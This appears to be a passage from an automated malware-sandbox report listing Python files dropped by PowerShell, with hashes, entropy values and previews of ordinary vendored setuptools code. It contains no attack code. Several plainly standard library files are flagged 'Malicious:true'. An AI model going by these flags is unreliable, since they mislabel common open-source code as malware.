                                                                                                                                                                                                                              Preview:import os.import pathlib.import tempfile.import functools.import contextlib.import types.import importlib.import inspect.import warnings.import itertools..from typing import Union, Optional, cast.from .abc import ResourceReader, Traversable..from ._compat import wrap_spec..Package = Union[types.ModuleType, str].Anchor = Package...def package_to_anchor(func):. """. Replace 'package' parameter as 'anchor' and warn about the change... Other errors should fall through... >>> files('a', 'b'). Traceback (most recent call last):. TypeError: files() takes from 0 to 1 positional arguments but 2 were given. """. undefined = object().. @functools.wraps(func). def wrapper(anchor=undefined, package=undefined):. if package is not undefined:. if anchor is not undefined:. return func(anchor, package). warnings.warn(. "First parameter to files is renamed to 'anchor'",. DeprecationWarning,.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2925
                                                                                                                                                                                                                              Entropy (8bit):4.394134302572429
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:ny4mvhZqka+Z7aQrNu4ku3bbAXD3Very3V1eW3Ve6c3sW1E3OnO0E2VEaFENEJOe:n2h4kN7bu4kurbyjkwlo1ioOp2SaCaJ5
                                                                                                                                                                                                                              MD5:B171C6D2167EBEC96A1D06EAC766BA59
                                                                                                                                                                                                                              SHA1:1E89884437142FF4909ACFE1E64E1B89F159FED8
                                                                                                                                                                                                                              SHA-256:2FC1D35B2002FCC20ABB1599BB0D33BD3AB9AA6500D2DB6BBCAF78D4ECC3294F
                                                                                                                                                                                                                              SHA-512:61E3A58AB26B81564184656030884494201304CC31AA73C9B44A861CD87DB97DE77A88AB4B8F5C749F5DF1B444804FD46F3D0C34D88842757B65F6A6A11D3985
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# flake8: noqa..import abc.import os.import sys.import pathlib.from contextlib import suppress.from typing import Union...if sys.version_info >= (3, 10):. from zipfile import Path as ZipPath # type: ignore.else:. from ..zipp import Path as ZipPath # type: ignore...try:. from typing import runtime_checkable # type: ignore.except ImportError:.. def runtime_checkable(cls): # type: ignore. return cls...try:. from typing import Protocol # type: ignore.except ImportError:. Protocol = abc.ABC # type: ignore...class TraversableResourcesLoader:. """. Adapt loaders to provide TraversableResources and other. compatibility... Used primarily for Python 3.9 and earlier where the native. loaders do not yet implement TraversableResources.. """.. def __init__(self, spec):. self.spec = spec.. @property. def path(self):. return self.spec.origin.. def get_resource_reader(self, name):. from . import readers, _adapters..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):884
                                                                                                                                                                                                                              Entropy (8bit):4.46109056113866
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:19uvcHG8MlVfwaNny/ME4/GGJgyWQ/HeRXkgwNzV3U:Huv11VNy/FCfJjWAeRU5NzVE
                                                                                                                                                                                                                              MD5:19609EDDE4368B4204BE41E3F2DDC980
                                                                                                                                                                                                                              SHA1:AEB22C2DFD0F5DBF25A590428AE844440AA61425
                                                                                                                                                                                                                              SHA-256:582749D46B3F90D170284372206ED33B4638DF82160AED338D5552B126D9C14F
                                                                                                                                                                                                                              SHA-512:278862307A554E8268C25AB6AB2DCCED45699DCA1520F1443619AEAC127E766E13A486035A73F1DFAFBEFD7A388DC4888633E3C1C4172148203A631A4049A53F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from itertools import filterfalse..from typing import (. Callable,. Iterable,. Iterator,. Optional,. Set,. TypeVar,. Union,.)..# Type and type variable definitions._T = TypeVar('_T')._U = TypeVar('_U')...def unique_everseen(. iterable: Iterable[_T], key: Optional[Callable[[_T], _U]] = None.) -> Iterator[_T]:. "List unique elements, preserving order. Remember all elements ever seen.". # unique_everseen('AAAABBBCCDAABBB') --> A B C D. # unique_everseen('ABBCcAD', str.lower) --> A B C D. seen: Set[Union[_T, _U]] = set(). seen_add = seen.add. if key is None:. for element in filterfalse(seen.__contains__, iterable):. seen_add(element). yield element. else:. for element in iterable:. k = key(element). if k not in seen:. seen_add(k). yield element.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3481
                                                                                                                                                                                                                              Entropy (8bit):4.639305030310512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:PCGvT7Cb0UhpaYqQk9ydrJayNlQNBkqjBfQRD:DL7CbrbaYqQXdJNNluBkAQRD
                                                                                                                                                                                                                              MD5:FA8FFE348D94EBB00DF3F7B782E0F545
                                                                                                                                                                                                                              SHA1:7D9E58EB2F737DB7E3F1A567DEAC4DE9E344AB6A
                                                                                                                                                                                                                              SHA-256:D1329D662C712D603EC70B40670E07729A899A3E17A6BC7566472DCB48134596
                                                                                                                                                                                                                              SHA-512:CBEF9606FED90BA580748B8F1D5C02D657531CA1B90F1263AD467E4DB6A60E2DD717EA7BA4BF8E23BCE9E6D9C3AF7DEDC5D6C607CA839074B000AD6935DFB0B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import functools.import os.import pathlib.import types.import warnings..from typing import Union, Iterable, ContextManager, BinaryIO, TextIO, Any..from . import _common..Package = Union[types.ModuleType, str].Resource = str...def deprecated(func):. @functools.wraps(func). def wrapper(*args, **kwargs):. warnings.warn(. f"{func.__name__} is deprecated. Use files() instead. ". "Refer to https://importlib-resources.readthedocs.io". "/en/latest/using.html#migrating-from-legacy for migration advice.",. DeprecationWarning,. stacklevel=2,. ). return func(*args, **kwargs).. return wrapper...def normalize_path(path: Any) -> str:. """Normalize a path by ensuring it is a string... If the resulting string contains path separators, an exception is raised.. """. str_path = str(path). parent, file_name = os.path.split(str_path). if parent:. raise ValueError(f'{path!r} must be only a file name'
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5140
                                                                                                                                                                                                                              Entropy (8bit):4.429427468535384
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Io1XVp4/ReVH7e/iC9eVdRKipp97eFttAGCgS4HM06HFyH+qg65jc70s+/JBe9ar:lG/Ube/RITK4p97ADaVFd25YX99xeqAX
                                                                                                                                                                                                                              MD5:7255A7E074CBC61797A316EA1A1CD8C9
                                                                                                                                                                                                                              SHA1:FB4877E9CD516C30EAAAADB4E98F664CB7DFF9B4
                                                                                                                                                                                                                              SHA-256:21CAF6209D90B47EEFBC007DBC2E56449F4A068683C896BB294B3C31CB913B3A
                                                                                                                                                                                                                              SHA-512:75CA82BDBCDB97261844A17CA7A6F35212B2FFDF4B04DB1C435864A6A303683F55E74485E86DA0503BCF18227F4F03D39626EC7CF89D556A6053A20664443693
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import abc.import io.import itertools.import pathlib.from typing import Any, BinaryIO, Iterable, Iterator, NoReturn, Text, Optional..from ._compat import runtime_checkable, Protocol, StrPath...__all__ = ["ResourceReader", "Traversable", "TraversableResources"]...class ResourceReader(metaclass=abc.ABCMeta):. """Abstract base class for loaders to provide resource reading support.""".. @abc.abstractmethod. def open_resource(self, resource: Text) -> BinaryIO:. """Return an opened, file-like object for binary reading... The 'resource' argument is expected to represent only a file name.. If the resource cannot be found, FileNotFoundError is raised.. """. # This deliberately raises FileNotFoundError instead of. # NotImplementedError so that if this method is accidentally called,. # it'll still do the right thing.. raise FileNotFoundError.. @abc.abstractmethod. def resource_path(self, resource: Text) -> Text:. """Ret
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3581
                                                                                                                                                                                                                              Entropy (8bit):4.509910765370803
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:kCZwY/Xo2s647B/3pYze4LKuXByy1FF0QQEtHuXb1rad+Vti0B5TPuoF:TwK42s/7NpEe0KuXMkL0QyNXTPHF
                                                                                                                                                                                                                              MD5:782E15F8AD8D9405C6D2D4123FBD777F
                                                                                                                                                                                                                              SHA1:91BF26340B87C065FF28CE6241AD7D089F4AA624
                                                                                                                                                                                                                              SHA-256:3D9B22E6A69CAF6427DCA1F0E2AC371A6D4CCEB05B94F1E84DD8EA8C7EC4296C
                                                                                                                                                                                                                              SHA-512:6605C20C7D7DCB6AA9A3EFC8B422339DD7468BBDF2C6FB0B9B44F1FB4E324836D01F40BB64ED2FDF602AFA6AC01B715E3E286F4077610A9B8B49453427AA8AFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import collections.import pathlib.import operator..from . import abc..from ._itertools import unique_everseen.from ._compat import ZipPath...def remove_duplicates(items):. return iter(collections.OrderedDict.fromkeys(items))...class FileReader(abc.TraversableResources):. def __init__(self, loader):. self.path = pathlib.Path(loader.path).parent.. def resource_path(self, resource):. """. Return the file system path to prevent. `resources.path()` from creating a temporary. copy.. """. return str(self.path.joinpath(resource)).. def files(self):. return self.path...class ZipReader(abc.TraversableResources):. def __init__(self, loader, module):. _, _, name = module.rpartition('.'). self.prefix = loader.prefix.replace('\\', '/') + name + '/'. self.archive = loader.archive.. def open_resource(self, resource):. try:. return super().open_resource(resource). except KeyError as e
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2576
                                                                                                                                                                                                                              Entropy (8bit):4.463017482100712
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:l7L588gj44PY2S0TeH/qk7f5adbt8PP405AUUfbd5yYLD/vrTC:l728gFHe/qk7f/noUUfpL7vrTC
                                                                                                                                                                                                                              MD5:CF4761CA4F9A11ACF55C1AB40A9D6E42
                                                                                                                                                                                                                              SHA1:E31C0A0DC08B4D58124E1EAC4A605B52CF9971C7
                                                                                                                                                                                                                              SHA-256:D3FFF64D0053428AA46A362634FB751F11117117804FA6E854A240DF6F29AF4E
                                                                                                                                                                                                                              SHA-512:FD3A61481655C799FA6695074CC57109DFA48D9A800E8B60D590B88F882A3D51E7B62A2FAAC1BA93F6AD54CA277D0770EEC51201C68C65116B8A40352AE9F205
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".Interface adapters for low-level readers.."""..import abc.import io.import itertools.from typing import BinaryIO, List..from .abc import Traversable, TraversableResources...class SimpleReader(abc.ABC):. """. The minimum, low-level interface required from a resource. provider.. """.. @property. @abc.abstractmethod. def package(self) -> str:. """. The name of the package for which this reader loads resources.. """.. @abc.abstractmethod. def children(self) -> List['SimpleReader']:. """. Obtain an iterable of SimpleReader for available. child containers (e.g. directories).. """.. @abc.abstractmethod. def resources(self) -> List[str]:. """. Obtain available named resources for this virtual package.. """.. @abc.abstractmethod. def open_binary(self, resource: str) -> BinaryIO:. """. Obtain a File-like for a named resource.. """.. @property. def name(self)
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.632017960496739
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:o1iclllVO8l4puWDFK5VcK85kdVWrzI0Q7RYKZgRPRwIaQHtgem/l:3cl/VnepZDw52KNdAr8p7lZa6Iaatgei
                                                                                                                                                                                                                              MD5:7E85874245D3C5E1CC8BE36384F2BF9A
                                                                                                                                                                                                                              SHA1:4EB7BFA11F4DF4AC2E51758781D90CB039EFE14E
                                                                                                                                                                                                                              SHA-256:52E58223B5614E39B0DE9E142884D5E14B2937480ED02DF777B7DD7DD112BC2A
                                                                                                                                                                                                                              SHA-512:C9431C430A2763803EF5FC27D69571771C198811FEE652188990D97AB2F4DF76BFD2099E48A17D5B216ED137FE39B3483487ACBEE2BD9FBF9976FEF61E9E6559
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................y.).N..r..........SC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/jaraco/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14343
                                                                                                                                                                                                                              Entropy (8bit):5.395746422796988
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:21kfaMp23mRxiT3wk9In0QdCzYcYQPuHBJtmSYPyihPIPo//QagP:21X622RxkW0nURJtcPygPv//O
                                                                                                                                                                                                                              MD5:F8634CC1C17207E8D8A4B1713C88C12F
                                                                                                                                                                                                                              SHA1:566C97AAB544C20E606411AE480A28AAFC4629F9
                                                                                                                                                                                                                              SHA-256:995285EEFCD21AA8CF07121379ED7483E96792459B627310702333FB7CA3B0F7
                                                                                                                                                                                                                              SHA-512:9360A9750591515BBAED399BAAEFC199EAC7A174871A8D0F17F7E0C9B7D839608046225282C4466BE7ED71B567F7DBB624EE513435CE1719D946B37C36CA08FA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vfb%........................4.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.j...................d.k...r.d.d.l.m.Z...n.d.d.l.Z.e.j$..................d.d...........Z.e.j$....................d.......d.d...........Z.........d.d...Z.d...Z...e.e.e.........Z.e.j$..................d...........Z.d...Z.e.j$..................e.j4..................f.d...........Z.e.j$..................d.d.e.f.d...........Z.d...Z...G.d...d.........Z...G.d...d.e.j>..................e.j@..........................Z...G.d...d.e.j@..........................Z!y.)......)...annotationsN)...Iterator)...........)...tarfilec................#........K.....t.........j...........................}.t.........j...................|.............|.......t.........j...................|...........y.#.t.........j...................|...........w.x.Y.w...w.).z.. >>> tmp_path = getfixture('tmp_path'). >>> with pushd(tmp_path):. ... assert os.getcwd() == o
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9570
                                                                                                                                                                                                                              Entropy (8bit):4.603804383885881
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:v3AEQpOr48SNbD5xiT3XwLxQEHQPuI4eJZ9+5bmR2/6B:vPuOINJTuwuJGbmR2/6B
                                                                                                                                                                                                                              MD5:51EC841AB9221ACDE6179E49E919C90E
                                                                                                                                                                                                                              SHA1:A77C7000FCE4F40C484847DA8CEB643A862FF4D5
                                                                                                                                                                                                                              SHA-256:7127980005104BF98F5000545AF93E1511F0D6759C0D812077A4B2B0BC6F1D3C
                                                                                                                                                                                                                              SHA-512:1080CBE92BBD64E2A5E19B7089C051F143010ECCD6561B8C14B45B90AB2E5EF0A28463B506ECB9B2447F9ABD46D495EB6BF400D9096DD1147F39455AB5A0364B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from __future__ import annotations..import contextlib.import functools.import operator.import os.import shutil.import subprocess.import sys.import tempfile.import urllib.request.import warnings.from typing import Iterator...if sys.version_info < (3, 12):. from setuptools.extern.backports import tarfile.else:. import tarfile...@contextlib.contextmanager.def pushd(dir: str | os.PathLike) -> Iterator[str | os.PathLike]:. """. >>> tmp_path = getfixture('tmp_path'). >>> with pushd(tmp_path):. ... assert os.getcwd() == os.fspath(tmp_path). >>> assert os.getcwd() != os.fspath(tmp_path). """.. orig = os.getcwd(). os.chdir(dir). try:. yield dir. finally:. os.chdir(orig)...@contextlib.contextmanager.def tarball(. url, target_dir: str | os.PathLike | None = None.) -> Iterator[str | os.PathLike]:. """. Get a tarball, extract it, yield, then clean up... >>> import urllib.request. >>> url = getfixture('tarfile_served'). >>> targ
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16696
                                                                                                                                                                                                                              Entropy (8bit):4.627197639477802
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:qlfOy0scMph4Bwf5Hj46RUCDGd9FE7tuC:fycMphGwf5Hj46RUCiKtF
                                                                                                                                                                                                                              MD5:A84EE67A40A21FA8854F4F2829961B0A
                                                                                                                                                                                                                              SHA1:B06AC5A1D0631DEDB76D530D7AC040150B9D818C
                                                                                                                                                                                                                              SHA-256:10C504C608CCE349E99FEE46E8D81C508E4C99CEF85B260F6AF8ED9B14404C7D
                                                                                                                                                                                                                              SHA-512:B344B7EC932034A5350ECF2FC1303BAD83EE40B28EDAFD01D63FA5E8760B7AB3CAF739590A066D63335328CACD618FAB7530D6790A3A74ED86B56890A57787B3
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import collections.abc.import functools.import inspect.import itertools.import operator.import time.import types.import warnings..import setuptools.extern.more_itertools...def compose(*funcs):. """. Compose any number of unary functions into a single unary function... >>> import textwrap. >>> expected = str.strip(textwrap.dedent(compose.__doc__)). >>> strip_and_dedent = compose(str.strip, textwrap.dedent). >>> strip_and_dedent(compose.__doc__) == expected. True.. Compose also allows the innermost function to take arbitrary arguments... >>> round_three = lambda x: round(x, ndigits=3). >>> f = compose(round_three, int.__truediv__). >>> [f(3*x, x+1) for x in range(1,10)]. [1.5, 2.0, 2.25, 2.4, 2.5, 2.571, 2.625, 2.667, 2.7]. """.. def compose_two(f1, f2):. return lambda *args, **kwargs: f1(f2(*args, **kwargs)).. return functools.reduce(compose_two, funcs)...def once(func):. """. Decorate func so it's only ever called the first time
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3982
                                                                                                                                                                                                                              Entropy (8bit):4.949229551507987
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:8iziOeiH3xP35rm8MAsAJMtZunIaKPKUIaKPKotZ:8Ro5HMDztZunIaKCUIaKCov
                                                                                                                                                                                                                              MD5:320B9A6C87527BC0D5B66C890939FDEF
                                                                                                                                                                                                                              SHA1:0A9C1518A5923C4FCA23D17927DB272831B8588E
                                                                                                                                                                                                                              SHA-256:37894B6DD84CB6B9B088ADD4B8C1A162C88E2CB671EBD09434E76614F49587A4
                                                                                                                                                                                                                              SHA-512:F168A0A5A9689369A7E26B1B300B644D5BF2001E5DB290BFCDCD2117F4B267CAC8039071BB1C40CC85B614224769EE1897B0667C785183762C453FD9C942500B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from collections.abc import Callable, Hashable, Iterator.from functools import partial.from operator import methodcaller.import sys.from typing import (. Any,. Generic,. Protocol,. TypeVar,. overload,.)..if sys.version_info >= (3, 10):. from typing import Concatenate, ParamSpec.else:. from typing_extensions import Concatenate, ParamSpec.._P = ParamSpec('_P')._R = TypeVar('_R')._T = TypeVar('_T')._R1 = TypeVar('_R1')._R2 = TypeVar('_R2')._V = TypeVar('_V')._S = TypeVar('_S')._R_co = TypeVar('_R_co', covariant=True)..class _OnceCallable(Protocol[_P, _R]):. saved_result: _R. reset: Callable[[], None]. def __call__(self, *args: _P.args, **kwargs: _P.kwargs) -> _R: .....class _ProxyMethodCacheWrapper(Protocol[_R_co]):. cache_clear: Callable[[], None]. def __call__(self, *args: Hashable, **kwargs: Hashable) -> _R_co: .....class _MethodCacheWrapper(Protocol[_R_co]):. def cache_clear(self) -> None: .... def __call__(self, *args: Hashable, **kwargs: Has
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22979
                                                                                                                                                                                                                              Entropy (8bit):5.368191158288452
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:ryM0fOyZcbOh+QABwFKvNqk1eJ+KENiU95HTLA0etuDb:rLQ6OhGwFK1qk1oEw85PA0etob
                                                                                                                                                                                                                              MD5:6504E82594DB095D7C80148173D17328
                                                                                                                                                                                                                              SHA1:CEE7DAE520FDBB0DA5AB3956540E94D62371E3FE
                                                                                                                                                                                                                              SHA-256:54CA799DA8B4DB6C90238F68C3AE30350B27E220D17FE3A25A860C31FA48F360
                                                                                                                                                                                                                              SHA-512:C64BCF86A637842604438AD72B5B581D41BA153C8EEF5130E0785EB5A4C372B535799879AD4F8AA366B5CDD18B3ACE2C4B273E9110ABAB5FF6CD5B32B420B994
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf8A.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d...Z.d...Z...e.j...........................f.d...Z.d...Z.d...Z.d...Z.d...Z...G.d...d.........Z.d...Z...e.d...e.j*..........................Z.d...d.d.f.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d.d...d...Z.d...Z.e.d...d...Z.d...Z e.jB..................d...........Z"e"jF..................d.e.jH..................jJ..................f.d...........Z&d...Z'y.)......Nc.....................4.....d...}.t.........j...................|.|.........S.).a;.... Compose any number of unary functions into a single unary function... >>> import textwrap. >>> expected = str.strip(textwrap.dedent(compose.__doc__)). >>> strip_and_dedent = compose(str.strip, textwrap.dedent). >>> strip_and_dedent(compose.__doc__) == expected. True.. Compose also allows the innermost function to take arbitrary arguments... >>> round_three = lambda x: round(x, ndigits=3). >>> f = compose(ro
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15517
                                                                                                                                                                                                                              Entropy (8bit):4.7158969950173715
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:foKVraRndn0gaZkuO2mTjzTOoOrwS12CS4LtlRAeg2gRWKPVpkWR7rB/rPiTIah3:foKdaRndn0g0O2ijzTwER/1/rW3
                                                                                                                                                                                                                              MD5:2EF9196FECA698E99CDCBFE6673EBC49
                                                                                                                                                                                                                              SHA1:88CED1B87B0652FBE099CC609E0DE706259B6B3E
                                                                                                                                                                                                                              SHA-256:29F14631EAEB90DFF4574AE0B49571FBD747B77B56EE2FEE272A63C0470BB42D
                                                                                                                                                                                                                              SHA-512:6A38AF68CCB4D209366CF82AA1C9162BE58B0ACADEC67C81D38D285C7720D0C71C3342FF1FF4A6467D3F5FE447815459378817032EA2FB8B7BC9DF9EE1698469
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import re.import itertools.import textwrap.import functools..try:. from importlib.resources import files # type: ignore.except ImportError: # pragma: nocover. from setuptools.extern.importlib_resources import files # type: ignore..from setuptools.extern.jaraco.functools import compose, method_cache.from setuptools.extern.jaraco.context import ExceptionTrap...def substitution(old, new):. """. Return a function that will perform a substitution on a string. """. return lambda s: s.replace(old, new)...def multi_substitution(*substitutions):. """. Take a sequence of pairs specifying substitutions, and create. a function that performs those substitutions... >>> multi_substitution(('foo', 'bar'), ('bar', 'baz'))('foo'). 'baz'. """. substitutions = itertools.starmap(substitution, substitutions). # compose function applies last function first, so reverse the. # substitutions to get the expected order.. substitutions = reversed(tuple(substituti
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):24418
                                                                                                                                                                                                                              Entropy (8bit):5.29364589856044
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:6K1FnFndex0wZ1XuO2c2mzcOQjOrwS12CS4LtlRZyyig2kRWOdhMgpcgDtCu/rED:6KTnFndex0k+O2GzcH+2gD/r0NFBGhy
                                                                                                                                                                                                                              MD5:E3E7534085E1C096C2019E868630ADE6
                                                                                                                                                                                                                              SHA1:EF130A70AEC9729999254620C4A918BFF5A047E8
                                                                                                                                                                                                                              SHA-256:D515A6F635BF26EF352E3B33C9E269CAEA9BBEF0F6C06873646DBA6BA2B70419
                                                                                                                                                                                                                              SHA-512:2C8CDAF5E5DFDEBB5110B70AADAA0E0C832FBB406595448A292C5F72655575B12800310DB4C054794AC07B1AEFB39E29298AEC6EA6A857A0C80B778375EF613D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf.<..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d...Z.d...Z...G.d...d.e.........Z...e.e.........Z.e.j&..................d...........Z.d...Z.d...Z.d...Z.d...Z...G.d...d.e.........Z.d d...Z...G.d...d.e.........Z.e.j<..................Z.d...Z ..G.d...d.e.........Z!..G.d...d.........Z"d...Z#d...Z$d...Z%d...Z&e.jN..................d...........Z(e(jS..................e.........d...........Z*d...Z+d...Z,y.#.e.$.r...d.d.l.m.Z...Y...w.x.Y.w.)!.....N)...files)...compose..method_cache)...ExceptionTrapc...................................f.d...S.).zH. Return a function that will perform a substitution on a string. c.....................(.......|.j...............................S...N....replace)...s..new..olds.... ...XC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/jaraco/text/__init__.py..<lambda>z.substitution.<locals>.<lambda>....s........Q.Y.Y.s.C..(.........).r....r....s....``r......substitutionr.......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):82
                                                                                                                                                                                                                              Entropy (8bit):4.210309701667189
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1LIKQMIVQP8F+rLXjXP8F+dMLvQEn:1L3yQP8FKLXjXP8FE8QEn
                                                                                                                                                                                                                              MD5:D4B166B10CCE8121F8BAA0FF488BDEF4
                                                                                                                                                                                                                              SHA1:63002B807E58F38FE53CBFC603AE72280E38009B
                                                                                                                                                                                                                              SHA-256:0BBB177DF1D35CCDCFFA268B3CF7EA7E60E8C4E7E540C24B70CEDE77DA778DA9
                                                                                                                                                                                                                              SHA-512:B3668A1C07F6E9804A6CAA268AAE6D8E60EB349E33F3790E847062EF36D1DE14D85A57CF0AF70669FC7FB0D451D8A1C5D71C65850116574F51A39EE0C1FF24AA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .more import * # noqa.from .recipes import * # noqa..__version__ = '8.8.0'.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                              Entropy (8bit):3.6006021160040067
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1LIKQMIVQlDDxXjXln:1L3yQlBXjXln
                                                                                                                                                                                                                              MD5:C8FC9D8B6958F88436396D8ECD41F206
                                                                                                                                                                                                                              SHA1:9C8024D961A266875E5C2F71C85F4D7843E86E4C
                                                                                                                                                                                                                              SHA-256:E41DDE4F338DD4106E38BA1BD6F09F97211BDA549DEAEB17410F82BFE85791E0
                                                                                                                                                                                                                              SHA-512:40AF263452D4DAEA2076821F39E8CF69BA392A5C0F8DDA51B4CC98BBD5389F54547D7E5C74CF4FB568CF14D0B28BFF14D6D25027318A33B0F1C7BFA34B41C9BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .more import *.from .recipes import *.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                              Entropy (8bit):5.140778714094942
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:+tzLbkvbmlIYL0cz64ptHw52KNdAr8p7lZ+fQ6Ian9N9t:qz8jmqDOptvKNxVlwfQjan9N9t
                                                                                                                                                                                                                              MD5:2F5131597982A93E19B7EE4F6A2A6F6D
                                                                                                                                                                                                                              SHA1:62BE3BE6CAE757AE56786103CBB4340E267892FE
